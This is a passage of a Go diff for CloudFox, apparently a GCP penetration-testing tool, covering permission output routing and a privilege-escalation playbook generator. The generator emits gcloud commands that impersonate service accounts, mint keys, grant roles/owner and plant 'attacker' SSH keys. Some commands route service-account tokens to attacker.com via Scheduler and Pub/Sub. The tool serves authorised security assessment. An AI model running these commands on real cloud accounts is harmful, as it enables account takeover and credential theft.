project-level output based on EffectiveProject +func (m *PermissionsModule) writeHierarchicalOutputTee(ctx context.Context, logger internal.Logger, orgID string, header []string, allPerms []ExplodedPermission, lootFiles []internal.LootFile) { + logger.InfoM(fmt.Sprintf("Using single-pass tee streaming for %d permissions", len(allPerms)), globals.GCP_PERMISSIONS_MODULE_NAME) + + pathBuilder := m.BuildPathBuilder() + + // Build the table data + body := m.permsToTableBody(allPerms) + tables := []internal.TableFile{{ + Name: "permissions", + Header: header, + Body: body, + }} + + // Build reverse lookup: for each folder, which projects are under it + // This allows O(1) lookup during row routing + folderToProjects := make(map[string][]string) + orgToProjects := make(map[string][]string) + + if m.OrgCache != nil && m.OrgCache.IsPopulated() { + for _, projectID := range m.ProjectIDs { + // Get the org this project belongs to + projectOrgID := m.OrgCache.GetProjectOrgID(projectID) + if projectOrgID != "" { + orgToProjects[projectOrgID] = append(orgToProjects[projectOrgID], projectID) + } + + // Get all ancestor folders for this project + ancestorFolders := m.OrgCache.GetProjectAncestorFolders(projectID) + for _, folderID := range ancestorFolders { + folderToProjects[folderID] = append(folderToProjects[folderID], projectID) + } + } + } + + // Create a row router that routes based on scope type and OrgCache + rowRouter := func(row []string) []string { + // Row format: [ScopeType, ScopeID, ScopeName, EntityType, Identity, Permission, ...] + scopeType := row[0] + scopeID := row[1] + + switch scopeType { + case "project": + // Direct project permission - route to that project only + return []string{scopeID} + case "organization": + // Org permission - route to all projects under this org + if projects, ok := orgToProjects[scopeID]; ok { + return projects + } + // Fallback if OrgCache not populated: route to all projects + return m.ProjectIDs + case "folder": + // Folder permission - route to all projects under this folder + if projects, ok := folderToProjects[scopeID]; ok { + return projects + } + // Fallback if folder not in cache: route to all projects + return m.ProjectIDs + default: + return nil + } + } + + // Use the tee streaming function + config := internal.TeeStreamingConfig{ + OrgID: orgID, + ProjectIDs: m.ProjectIDs, + Tables: tables, + LootFiles: lootFiles, + ProjectLootCollector: m.collectLootFilesForProject, + RowRouter: rowRouter, + PathBuilder: pathBuilder, + Format: m.Format, + Verbosity: m.Verbosity, + Wrap: m.WrapTable, + } + + err := internal.HandleHierarchicalOutputTee(config) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing tee streaming output: %v", err), globals.GCP_PERMISSIONS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + // writeFlatOutput writes all output to a single directory (legacy mode) func (m *PermissionsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { header := m.getTableHeader() @@ -938,19 +1229,8 @@ func (m *PermissionsModule) writeFlatOutput(ctx context.Context, logger internal return body[i][5] < body[j][5] }) - // Collect all loot files - var lootFiles []internal.LootFile - for _, projectLoot := range m.LootMap { - for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - } - // Add enumeration loot file - if m.EnumLoot != nil && m.EnumLoot.Contents != "" { - lootFiles = append(lootFiles, *m.EnumLoot) - } + // Collect all loot files for flat output + lootFiles := m.collectAllLootFiles() tables := []internal.TableFile{{ Name: "permissions", diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go old mode 100644 new mode 100755 index f0454026..11fbf8f6 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -49,6 +49,7 @@ type PrivescModule struct { // FoxMapper data FoxMapperCache *gcpinternal.FoxMapperCache Findings []foxmapperservice.PrivescFinding + OrgCache *gcpinternal.OrgCache // Loot LootMap map[string]*internal.LootFile @@ -80,6 +81,9 @@ func runGCPPrivescCommand(cmd *cobra.Command, args []string) { func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Analyzing privilege escalation paths using FoxMapper...", globals.GCP_PRIVESC_MODULE_NAME) + // Get OrgCache for project number resolution + m.OrgCache = gcpinternal.GetOrgCacheFromContext(ctx) + // Get FoxMapper cache from context or try to load it m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { @@ -145,149 +149,215 @@ func (m *PrivescModule) Execute(ctx context.Context, logger internal.Logger) { } func (m *PrivescModule) generateLoot() { - m.LootMap["privesc-exploit-commands"] = &internal.LootFile{ - Name: "privesc-exploit-commands", - Contents: "# GCP Privilege Escalation Exploit Commands\n# Generated by CloudFox using FoxMapper graph data\n\n", + // Loot is now generated per-project in writeHierarchicalOutput/writeFlatOutput +} + +// getPrivescExploitCommand returns specific exploitation commands for a privesc technique +// technique is the short reason, fullReason contains more details +func getPrivescExploitCommand(technique, fullReason, sourcePrincipal, targetPrincipal, project string) string { + // Clean target principal for use in commands + targetSA := targetPrincipal + if strings.HasPrefix(targetSA, "serviceAccount:") { + targetSA = strings.TrimPrefix(targetSA, "serviceAccount:") + } + if strings.HasPrefix(targetSA, "user:") { + targetSA = strings.TrimPrefix(targetSA, "user:") } - // Generate playbook - m.generatePlaybook() -} + // Clean source principal + sourceSA := sourcePrincipal + if strings.HasPrefix(sourceSA, "serviceAccount:") { + sourceSA = strings.TrimPrefix(sourceSA, "serviceAccount:") + } -func (m *PrivescModule) generatePlaybook() { - var sb strings.Builder - sb.WriteString("# GCP Privilege Escalation Playbook\n") - sb.WriteString("# Generated by CloudFox using FoxMapper graph data\n\n") + // Combine technique and fullReason for matching + combinedLower := strings.ToLower(technique + " " + fullReason) - // Group findings by admin level reachable - orgPaths := []foxmapperservice.PrivescFinding{} - folderPaths := []foxmapperservice.PrivescFinding{} - projectPaths := []foxmapperservice.PrivescFinding{} + switch { + // Service Account Token/Key Creation - most common privesc + case strings.Contains(combinedLower, "getaccesstoken") || strings.Contains(combinedLower, "generateaccesstoken") || + strings.Contains(combinedLower, "iam.serviceaccounts.getaccesstoken"): + return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", targetSA) - for _, f := range m.Findings { - if f.IsAdmin { - continue // Skip admins in playbook - } - if !f.CanEscalate { - continue - } + case strings.Contains(combinedLower, "signblob") || strings.Contains(combinedLower, "iam.serviceaccounts.signblob"): + return fmt.Sprintf("gcloud iam service-accounts sign-blob --iam-account=%s input.txt output.sig", targetSA) - switch f.HighestAdminLevel { - case "org": - orgPaths = append(orgPaths, f) - case "folder": - folderPaths = append(folderPaths, f) - case "project": - projectPaths = append(projectPaths, f) - } - } + case strings.Contains(combinedLower, "signjwt") || strings.Contains(combinedLower, "iam.serviceaccounts.signjwt"): + return fmt.Sprintf("gcloud iam service-accounts sign-jwt --iam-account=%s input.json output.jwt", targetSA) - // Organization-level privesc (highest priority) - if len(orgPaths) > 0 { - sb.WriteString("## CRITICAL: Organization Admin Reachable\n\n") - for _, f := range orgPaths { - m.writePrivescFindingToPlaybook(&sb, f) - } - } + case strings.Contains(combinedLower, "serviceaccountkeys.create") || strings.Contains(combinedLower, "keys.create") || + strings.Contains(combinedLower, "iam.serviceaccountkeys.create"): + return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", targetSA) - // Folder-level privesc - if len(folderPaths) > 0 { - sb.WriteString("## HIGH: Folder Admin Reachable\n\n") - for _, f := range folderPaths { - m.writePrivescFindingToPlaybook(&sb, f) + case strings.Contains(combinedLower, "generateidtoken") || strings.Contains(combinedLower, "openidtoken") || + strings.Contains(combinedLower, "iam.serviceaccounts.generateidtoken"): + return fmt.Sprintf("gcloud auth print-identity-token --impersonate-service-account=%s --audiences=https://example.com", targetSA) + + // Token Creator role - can impersonate + case strings.Contains(combinedLower, "tokencreator") || strings.Contains(combinedLower, "serviceaccounttokencreator"): + return fmt.Sprintf("# Has Token Creator role on target\ngcloud auth print-access-token --impersonate-service-account=%s", targetSA) + + // Service Account User role - can attach SA to resources + case strings.Contains(combinedLower, "serviceaccountuser") || strings.Contains(combinedLower, "actas") || + strings.Contains(combinedLower, "iam.serviceaccounts.actas"): + return fmt.Sprintf("# Has actAs permission - can attach this SA to compute resources\n# Option 1: Create VM with target SA\ngcloud compute instances create privesc-vm --service-account=%s --scopes=cloud-platform --zone=us-central1-a --project=%s\n\n# Option 2: Deploy Cloud Function with target SA\ngcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=%s --source=. --entry-point=main --project=%s", targetSA, project, targetSA, project) + + // Workload Identity - GKE pod can impersonate SA + case strings.Contains(combinedLower, "workload identity") || strings.Contains(combinedLower, "workloadidentity") || + strings.Contains(combinedLower, "gke") || strings.Contains(combinedLower, "kubernetes"): + return fmt.Sprintf("# Workload Identity binding - GKE pod can impersonate SA\n# From within the GKE pod:\ncurl -H \"Metadata-Flavor: Google\" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/%s/token", targetSA) + + // IAM Policy Modification + case strings.Contains(combinedLower, "setiampolicy") || strings.Contains(combinedLower, "resourcemanager") || + strings.Contains(combinedLower, "iam.setiampolicy"): + if strings.Contains(combinedLower, "organization") || strings.Contains(combinedLower, "org") { + return fmt.Sprintf("# Can modify org IAM policy\ngcloud organizations add-iam-policy-binding ORG_ID --member=serviceAccount:%s --role=roles/owner", sourceSA) + } else if strings.Contains(combinedLower, "folder") { + return fmt.Sprintf("# Can modify folder IAM policy\ngcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=serviceAccount:%s --role=roles/owner", sourceSA) } - } + return fmt.Sprintf("# Can modify project IAM policy\ngcloud projects add-iam-policy-binding %s --member=serviceAccount:%s --role=roles/owner", project, sourceSA) - // Project-level privesc - if len(projectPaths) > 0 { - sb.WriteString("## MEDIUM: Project Admin Reachable\n\n") - for _, f := range projectPaths { - m.writePrivescFindingToPlaybook(&sb, f) + // Compute Instance Creation + case strings.Contains(combinedLower, "compute.instances.create") || strings.Contains(combinedLower, "create instance"): + return fmt.Sprintf("gcloud compute instances create privesc-vm --service-account=%s --scopes=cloud-platform --zone=us-central1-a --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "compute.instances.setserviceaccount"): + return fmt.Sprintf("gcloud compute instances set-service-account INSTANCE_NAME --service-account=%s --scopes=cloud-platform --zone=ZONE --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "compute.instances.setmetadata") || strings.Contains(combinedLower, "ssh"): + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE_NAME --metadata=ssh-keys=\"attacker:$(cat ~/.ssh/id_rsa.pub)\" --zone=ZONE --project=%s", project) + + // Cloud Functions + case strings.Contains(combinedLower, "cloudfunctions.functions.create") || strings.Contains(combinedLower, "functions.create"): + return fmt.Sprintf("gcloud functions deploy privesc-func --runtime=python39 --trigger-http --service-account=%s --source=. --entry-point=main --project=%s", targetSA, project) + + case strings.Contains(combinedLower, "cloudfunctions.functions.update") || strings.Contains(combinedLower, "functions.update"): + return fmt.Sprintf("gcloud functions deploy FUNCTION_NAME --service-account=%s --project=%s", targetSA, project) + + // Cloud Run + case strings.Contains(combinedLower, "run.services.create") || strings.Contains(combinedLower, "cloudrun"): + return fmt.Sprintf("gcloud run deploy privesc-svc --image=gcr.io/%s/privesc-img --service-account=%s --region=us-central1 --project=%s", project, targetSA, project) + + case strings.Contains(combinedLower, "run.services.update"): + return fmt.Sprintf("gcloud run services update SERVICE_NAME --service-account=%s --region=REGION --project=%s", targetSA, project) + + // Cloud Scheduler + case strings.Contains(combinedLower, "cloudscheduler") || strings.Contains(combinedLower, "scheduler.jobs"): + return fmt.Sprintf("gcloud scheduler jobs create http privesc-job --schedule=\"* * * * *\" --uri=https://attacker.com/callback --oidc-service-account-email=%s --project=%s", targetSA, project) + + // Dataproc + case strings.Contains(combinedLower, "dataproc"): + return fmt.Sprintf("gcloud dataproc clusters create privesc-cluster --service-account=%s --region=us-central1 --project=%s", targetSA, project) + + // Composer + case strings.Contains(combinedLower, "composer"): + return fmt.Sprintf("gcloud composer environments create privesc-env --service-account=%s --location=us-central1 --project=%s", targetSA, project) + + // Workflows + case strings.Contains(combinedLower, "workflows"): + return fmt.Sprintf("gcloud workflows deploy privesc-workflow --source=workflow.yaml --service-account=%s --project=%s", targetSA, project) + + // Pub/Sub + case strings.Contains(combinedLower, "pubsub"): + return fmt.Sprintf("gcloud pubsub subscriptions create privesc-sub --topic=TOPIC --push-endpoint=https://attacker.com/endpoint --push-auth-service-account=%s --project=%s", targetSA, project) + + // Storage HMAC + case strings.Contains(combinedLower, "storage.hmackeys"): + return fmt.Sprintf("gsutil hmac create %s", targetSA) + + // Deployment Manager + case strings.Contains(combinedLower, "deploymentmanager"): + return fmt.Sprintf("gcloud deployment-manager deployments create privesc-deploy --config=deployment.yaml --project=%s", project) + + // API Keys + case strings.Contains(combinedLower, "apikeys"): + return fmt.Sprintf("gcloud alpha services api-keys create --project=%s", project) + + // Org Policy + case strings.Contains(combinedLower, "orgpolicy"): + return fmt.Sprintf("gcloud org-policies set-policy policy.yaml --project=%s", project) + + // Generic IAM edge - likely token creator or actAs relationship + case strings.ToLower(technique) == "iam" || strings.Contains(combinedLower, "iam binding"): + // Check if target is a service account + if strings.Contains(targetSA, ".iam.gserviceaccount.com") || strings.Contains(targetSA, "@") { + return fmt.Sprintf("# IAM relationship allows impersonation of target SA\n# Try token generation:\ngcloud auth print-access-token --impersonate-service-account=%s\n\n# Or create SA key (if permitted):\ngcloud iam service-accounts keys create key.json --iam-account=%s", targetSA, targetSA) } - } + return fmt.Sprintf("# IAM relationship to target principal\n# Check IAM bindings for specific permissions:\ngcloud iam service-accounts get-iam-policy %s", targetSA) - m.LootMap["privesc-playbook"] = &internal.LootFile{ - Name: "privesc-playbook", - Contents: sb.String(), + default: + // Provide a helpful default with the most common privesc commands + if strings.Contains(targetSA, ".iam.gserviceaccount.com") { + return fmt.Sprintf("# %s\n# Target: %s\n\n# Try impersonation:\ngcloud auth print-access-token --impersonate-service-account=%s\n\n# Or create key:\ngcloud iam service-accounts keys create key.json --iam-account=%s", fullReason, targetSA, targetSA, targetSA) + } + return fmt.Sprintf("# %s\n# Target: %s", fullReason, targetSA) } } // writePrivescFindingToPlaybook writes a detailed privesc finding to the playbook func (m *PrivescModule) writePrivescFindingToPlaybook(sb *strings.Builder, f foxmapperservice.PrivescFinding) { - sb.WriteString(fmt.Sprintf("### %s\n", f.Principal)) - sb.WriteString(fmt.Sprintf("- **Type**: %s\n", f.MemberType)) - sb.WriteString(fmt.Sprintf("- **Shortest path**: %d hops\n", f.ShortestPathHops)) - sb.WriteString(fmt.Sprintf("- **Viable paths**: %d\n", f.ViablePathCount)) + // Get source principal's project + sourceProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + if sourceProject == "" { + sourceProject = "PROJECT" + } + + sb.WriteString(fmt.Sprintf("# %s (%s)\n", f.Principal, f.MemberType)) + sb.WriteString(fmt.Sprintf("# Shortest path: %d hops | Viable paths: %d\n", f.ShortestPathHops, f.ViablePathCount)) if f.ScopeBlockedCount > 0 { - sb.WriteString(fmt.Sprintf("- **Scope-blocked paths**: %d (OAuth scope restrictions)\n", f.ScopeBlockedCount)) + sb.WriteString(fmt.Sprintf("# WARNING: %d paths blocked by OAuth scopes\n", f.ScopeBlockedCount)) } sb.WriteString("\n") - // Show all paths with detailed steps + // Show the best path with actual commands if len(f.Paths) > 0 { - sb.WriteString("#### Attack Paths\n\n") - for pathIdx, path := range f.Paths { - // Limit to top 5 paths per principal to avoid excessive output - if pathIdx >= 5 { - sb.WriteString(fmt.Sprintf("*... and %d more paths*\n\n", len(f.Paths)-5)) - break - } + // Only show the best (first) path with commands + path := f.Paths[0] - scopeStatus := "" - if path.ScopeBlocked { - scopeStatus = " ⚠️ SCOPE-BLOCKED" - } + if path.ScopeBlocked { + sb.WriteString("# NOTE: This path may be blocked by OAuth scope restrictions\n\n") + } - sb.WriteString(fmt.Sprintf("**Path %d** → %s (%s admin, %d hops)%s\n", - pathIdx+1, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) - sb.WriteString("```\n") - sb.WriteString(fmt.Sprintf("%s\n", f.Principal)) + // If source is a service account, add impersonation + if strings.Contains(f.MemberType, "serviceAccount") || strings.Contains(f.Principal, ".iam.gserviceaccount.com") { + sb.WriteString(fmt.Sprintf("# Step 0: Impersonate the source service account\ngcloud config set auth/impersonate_service_account %s\n\n", f.Principal)) + } - for i, edge := range path.Edges { - // Show the hop number and technique - prefix := " │" - if i == len(path.Edges)-1 { - prefix = " └" - } + // Generate commands for each edge in the path + currentPrincipal := f.Principal + for i, edge := range path.Edges { + scopeWarning := "" + if edge.ScopeBlocksEscalation { + scopeWarning = " [BLOCKED BY SCOPE]" + } else if edge.ScopeLimited { + scopeWarning = " [scope-limited]" + } - scopeWarning := "" - if edge.ScopeBlocksEscalation { - scopeWarning = " [BLOCKED BY SCOPE]" - } else if edge.ScopeLimited { - scopeWarning = " [scope-limited]" - } + // Use full reason if available, otherwise short reason + displayReason := edge.Reason + if displayReason == "" { + displayReason = edge.ShortReason + } - sb.WriteString(fmt.Sprintf("%s── (%d) %s%s\n", prefix, i+1, edge.ShortReason, scopeWarning)) + sb.WriteString(fmt.Sprintf("# Step %d: %s%s\n", i+1, displayReason, scopeWarning)) - // Show destination after each hop - if edge.Destination != "" { - destDisplay := edge.Destination - // Clean up member ID format for display - if strings.HasPrefix(destDisplay, "serviceAccount:") { - destDisplay = strings.TrimPrefix(destDisplay, "serviceAccount:") - } else if strings.HasPrefix(destDisplay, "user:") { - destDisplay = strings.TrimPrefix(destDisplay, "user:") - } - if i == len(path.Edges)-1 { - sb.WriteString(fmt.Sprintf(" → %s (ADMIN)\n", destDisplay)) - } else { - sb.WriteString(fmt.Sprintf(" │ → %s\n", destDisplay)) - } - } - } - sb.WriteString("```\n\n") + // Get the exploit command for this technique (pass both short and full reason) + cmd := getPrivescExploitCommand(edge.ShortReason, edge.Reason, currentPrincipal, edge.Destination, sourceProject) + sb.WriteString(cmd) + sb.WriteString("\n\n") - // Show detailed exploitation steps - if !path.ScopeBlocked && len(path.Edges) > 0 { - sb.WriteString("**Exploitation steps:**\n") - for i, edge := range path.Edges { - sb.WriteString(fmt.Sprintf("%d. %s\n", i+1, edge.Reason)) - } - sb.WriteString("\n") - } + currentPrincipal = edge.Destination } + + // Final note about admin access + targetAdmin := path.Destination + if strings.HasPrefix(targetAdmin, "serviceAccount:") { + targetAdmin = strings.TrimPrefix(targetAdmin, "serviceAccount:") + } + sb.WriteString(fmt.Sprintf("# Result: Now have %s admin access via %s\n", path.AdminLevel, targetAdmin)) } - sb.WriteString("---\n\n") + + sb.WriteString("\n# -----------------------------------------------------------------------------\n\n") } func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -300,22 +370,27 @@ func (m *PrivescModule) writeOutput(ctx context.Context, logger internal.Logger) func (m *PrivescModule) getHeader() []string { return []string{ + "Project", + "Principal Type", "Principal", - "Type", "Is Admin", "Admin Level", - "Can Escalate", - "Highest Reachable", - "Path Summary", + "Privesc To", + "Privesc Admin Level", "Hops", - "Viable Paths", - "Scope Blocked", + "Permission", } } func (m *PrivescModule) findingsToTableBody() [][]string { var body [][]string for _, f := range m.Findings { + // Extract project from principal + project := extractProjectFromPrincipal(f.Principal, m.OrgCache) + if project == "" { + project = "-" + } + isAdmin := "No" if f.IsAdmin { isAdmin = "Yes" @@ -326,174 +401,439 @@ func (m *PrivescModule) findingsToTableBody() [][]string { adminLevel = "-" } - canEscalate := "No" - if f.CanEscalate { - canEscalate = "Yes" - } - - highestReachable := "-" - if f.CanEscalate || f.IsAdmin { - highestReachable = f.HighestAdminLevel - } + // Privesc target + privescTo := "-" + privescAdminLevel := "-" + hops := "-" + permission := "-" - // Build path summary showing cross-project or internal escalation - pathSummary := "-" if f.CanEscalate && len(f.Paths) > 0 { - pathSummary = m.buildPathSummary(f) - } + // Get the best path info + bestPath := f.Paths[0] + privescTo = bestPath.Destination + // Clean up display + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + hops = fmt.Sprintf("%d", bestPath.HopCount) - hops := "-" - if f.ShortestPathHops > 0 { - hops = fmt.Sprintf("%d", f.ShortestPathHops) - } + // Get the permission from the first edge - prefer Reason over ShortReason + if len(bestPath.Edges) > 0 { + permission = extractPermissionFromEdge(bestPath.Edges[0]) + } - viablePaths := "-" - if f.ViablePathCount > 0 { - viablePaths = fmt.Sprintf("%d", f.ViablePathCount) - } + // Format privesc admin level + // Try to get more info from the FoxMapper cache if available + var destNode *foxmapperservice.Node + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + destNode = m.FoxMapperCache.GetService().GetNode(bestPath.Destination) + } - scopeBlocked := "-" - if f.ScopeBlockedCount > 0 { - scopeBlocked = fmt.Sprintf("%d", f.ScopeBlockedCount) + switch bestPath.AdminLevel { + case "org": + privescAdminLevel = "Org" + case "folder": + // Try to extract folder from the destination node's IAM bindings + if destNode != nil && len(destNode.IAMBindings) > 0 { + for _, binding := range destNode.IAMBindings { + if resource, ok := binding["resource"].(string); ok { + if strings.HasPrefix(resource, "folders/") { + folderID := strings.TrimPrefix(resource, "folders/") + privescAdminLevel = fmt.Sprintf("Folder: %s", folderID) + break + } + } + } + } + if privescAdminLevel == "-" { + privescAdminLevel = "Folder" + } + case "project": + // Try to get the project ID from the destination node or principal + if destNode != nil && destNode.ProjectID != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destNode.ProjectID) + } else { + destProject := extractProjectFromPrincipal(bestPath.Destination, m.OrgCache) + if destProject != "" { + privescAdminLevel = fmt.Sprintf("Project: %s", destProject) + } else { + privescAdminLevel = "Project" + } + } + default: + privescAdminLevel = bestPath.AdminLevel + } } body = append(body, []string{ - f.Principal, + project, f.MemberType, + f.Principal, isAdmin, adminLevel, - canEscalate, - highestReachable, - pathSummary, + privescTo, + privescAdminLevel, hops, - viablePaths, - scopeBlocked, + permission, }) } return body } -// buildPathSummary creates a summary showing the escalation path type -// e.g., "proj-a → proj-b (cross-project)" or "proj-a (internal)" -func (m *PrivescModule) buildPathSummary(f foxmapperservice.PrivescFinding) string { - // Extract source project from principal email - sourceProject := extractProjectFromPrincipal(f.Principal) - - // Get destination project from the best path - destProject := f.HighestReachableProject +// extractPermissionFromEdge extracts a clean permission string from an edge +func extractPermissionFromEdge(edge foxmapperservice.Edge) string { + reason := edge.Reason + if reason == "" { + reason = edge.ShortReason + } + + // Try to extract actual IAM permission patterns + reasonLower := strings.ToLower(reason) + + // Common permission patterns + switch { + case strings.Contains(reasonLower, "serviceaccounts.getaccesstoken") || strings.Contains(reasonLower, "getaccesstoken"): + return "iam.serviceAccounts.getAccessToken" + case strings.Contains(reasonLower, "serviceaccountkeys.create") || strings.Contains(reasonLower, "keys.create"): + return "iam.serviceAccountKeys.create" + case strings.Contains(reasonLower, "serviceaccounts.actas") || strings.Contains(reasonLower, "actas"): + return "iam.serviceAccounts.actAs" + case strings.Contains(reasonLower, "serviceaccounts.signblob") || strings.Contains(reasonLower, "signblob"): + return "iam.serviceAccounts.signBlob" + case strings.Contains(reasonLower, "serviceaccounts.signjwt") || strings.Contains(reasonLower, "signjwt"): + return "iam.serviceAccounts.signJwt" + case strings.Contains(reasonLower, "serviceaccounts.generateidtoken") || strings.Contains(reasonLower, "generateidtoken"): + return "iam.serviceAccounts.generateIdToken" + case strings.Contains(reasonLower, "getopenidtoken") || strings.Contains(reasonLower, "openidtoken") || + strings.Contains(reasonLower, "oidc token"): + return "iam.serviceAccounts.getOpenIdToken" + case strings.Contains(reasonLower, "tokencreator"): + return "roles/iam.serviceAccountTokenCreator" + case strings.Contains(reasonLower, "serviceaccountuser"): + return "roles/iam.serviceAccountUser" + case strings.Contains(reasonLower, "workload identity") || strings.Contains(reasonLower, "workloadidentity"): + return "Workload Identity binding" + case strings.Contains(reasonLower, "setiampolicy"): + return "*.setIamPolicy" + case strings.Contains(reasonLower, "compute.instances.create"): + return "compute.instances.create" + case strings.Contains(reasonLower, "cloudfunctions.functions.create"): + return "cloudfunctions.functions.create" + case strings.Contains(reasonLower, "run.services.create"): + return "run.services.create" + case strings.Contains(reasonLower, "owner"): + return "roles/owner" + case strings.Contains(reasonLower, "editor"): + return "roles/editor" + } + + // If we have a short reason that looks like a permission, use it + if edge.ShortReason != "" && edge.ShortReason != "IAM" { + return edge.ShortReason + } + + // Default to the reason if nothing else matches + return reason +} - // If we couldn't determine projects, show a simple summary - if sourceProject == "" && destProject == "" { - return fmt.Sprintf("→ %s admin", f.HighestAdminLevel) +// extractProjectFromPrincipal extracts project ID from a service account email. +// If orgCache is provided, it resolves project numbers to IDs. +// e.g., "sa@my-project.iam.gserviceaccount.com" -> "my-project" +func extractProjectFromPrincipal(principal string, orgCache ...*gcpinternal.OrgCache) string { + var cache *gcpinternal.OrgCache + if len(orgCache) > 0 { + cache = orgCache[0] } - // Handle org/folder level escalation - if f.HighestAdminLevel == "org" { - if sourceProject != "" { - return fmt.Sprintf("%s → org", sourceProject) + // Helper to resolve a project number to ID via OrgCache + resolveNumber := func(number string) string { + if cache != nil && cache.IsPopulated() { + if resolved := cache.GetProjectIDByNumber(number); resolved != "" { + return resolved + } } - return "→ org" + return "" } - if f.HighestAdminLevel == "folder" { - if sourceProject != "" { - return fmt.Sprintf("%s → folder", sourceProject) - } - return "→ folder" + parts := strings.Split(principal, "@") + if len(parts) != 2 { + return "" } + prefix := parts[0] + domain := parts[1] - // Project-level escalation - if sourceProject == "" { - sourceProject = "?" - } - if destProject == "" { - destProject = "?" + // Pattern: name@project-id.iam.gserviceaccount.com (regular SAs) + // But NOT gcp-sa-* domains (those are Google service agents with project numbers) + if strings.HasSuffix(domain, ".iam.gserviceaccount.com") && !strings.HasPrefix(domain, "gcp-sa-") { + projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") + return projectPart } - if sourceProject == destProject { - return fmt.Sprintf("%s (internal)", sourceProject) + // Pattern: service-PROJECT_NUMBER@gcp-sa-*.iam.gserviceaccount.com + if strings.HasPrefix(domain, "gcp-sa-") && strings.HasSuffix(domain, ".iam.gserviceaccount.com") { + number := prefix + if strings.HasPrefix(prefix, "service-") { + number = strings.TrimPrefix(prefix, "service-") + } + if resolved := resolveNumber(number); resolved != "" { + return resolved + } + return "" } - return fmt.Sprintf("%s → %s", sourceProject, destProject) -} + // Pattern: PROJECT_ID@appspot.gserviceaccount.com + if domain == "appspot.gserviceaccount.com" { + return prefix + } -// extractProjectFromPrincipal extracts project ID from a service account email -// e.g., "sa@my-project.iam.gserviceaccount.com" -> "my-project" -func extractProjectFromPrincipal(principal string) string { - // Handle service account format: name@project.iam.gserviceaccount.com - if strings.Contains(principal, ".iam.gserviceaccount.com") { - parts := strings.Split(principal, "@") - if len(parts) == 2 { - domain := parts[1] - projectPart := strings.TrimSuffix(domain, ".iam.gserviceaccount.com") - return projectPart + // Pattern: PROJECT_NUMBER-compute@developer.gserviceaccount.com + if strings.HasSuffix(domain, "developer.gserviceaccount.com") { + if idx := strings.Index(prefix, "-compute"); idx > 0 { + number := prefix[:idx] + if resolved := resolveNumber(number); resolved != "" { + return resolved + } } + return "" } - // Handle compute default SA: project-number-compute@developer.gserviceaccount.com - if strings.Contains(principal, "-compute@developer.gserviceaccount.com") { - // Can't easily get project name from number, return empty + // Pattern: PROJECT_NUMBER@cloudservices.gserviceaccount.com + if domain == "cloudservices.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved + } return "" } - // Handle App Engine default SA: project@appspot.gserviceaccount.com - if strings.Contains(principal, "@appspot.gserviceaccount.com") { - parts := strings.Split(principal, "@") - if len(parts) == 2 { - return strings.TrimSuffix(parts[0], "") + // Pattern: PROJECT_NUMBER@cloudbuild.gserviceaccount.com + if domain == "cloudbuild.gserviceaccount.com" { + if resolved := resolveNumber(prefix); resolved != "" { + return resolved } + return "" } return "" } -func (m *PrivescModule) buildAllTables() []internal.TableFile { - if len(m.Findings) == 0 { - return nil +// findingsForProject returns findings filtered for a specific project +// Includes: SAs from that project + users/groups (which apply to all projects) +func (m *PrivescModule) findingsForProject(projectID string) []foxmapperservice.PrivescFinding { + var filtered []foxmapperservice.PrivescFinding + for _, f := range m.Findings { + principalProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject == projectID || principalProject == "" { + filtered = append(filtered, f) + } } - return []internal.TableFile{ - { - Name: "privesc", - Header: m.getHeader(), - Body: m.findingsToTableBody(), - }, + return filtered +} + +// findingsToTableBodyForProject returns table body for a specific project's findings +func (m *PrivescModule) findingsToTableBodyForProject(projectID string) [][]string { + var body [][]string + for _, f := range m.Findings { + principalProject := extractProjectFromPrincipal(f.Principal, m.OrgCache) + + // Include if: SA from this project OR user/group (no project - applies to all) + if principalProject != projectID && principalProject != "" { + continue + } + + // For display, show the principal's project or "-" for users/groups + displayProject := principalProject + if displayProject == "" { + displayProject = "-" + } + + isAdmin := "No" + if f.IsAdmin { + isAdmin = "Yes" + } + + adminLevel := f.HighestAdminLevel + if adminLevel == "" { + adminLevel = "-" + } + + // Privesc target + privescTo := "-" + privescAdminLevel := "-" + hops := "-" + permission := "-" + + if f.CanEscalate && len(f.Paths) > 0 { + bestPath := f.Paths[0] + privescTo = bestPath.Destination + if strings.HasPrefix(privescTo, "serviceAccount:") { + privescTo = strings.TrimPrefix(privescTo, "serviceAccount:") + } else if strings.HasPrefix(privescTo, "user:") { + privescTo = strings.TrimPrefix(privescTo, "user:") + } + hops = fmt.Sprintf("%d", bestPath.HopCount) + + // Get the permission from the first edge + if len(bestPath.Edges) > 0 { + permission = extractPermissionFromEdge(bestPath.Edges[0]) + } + + // Format privesc admin level + var destNode *foxmapperservice.Node + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + destNode = 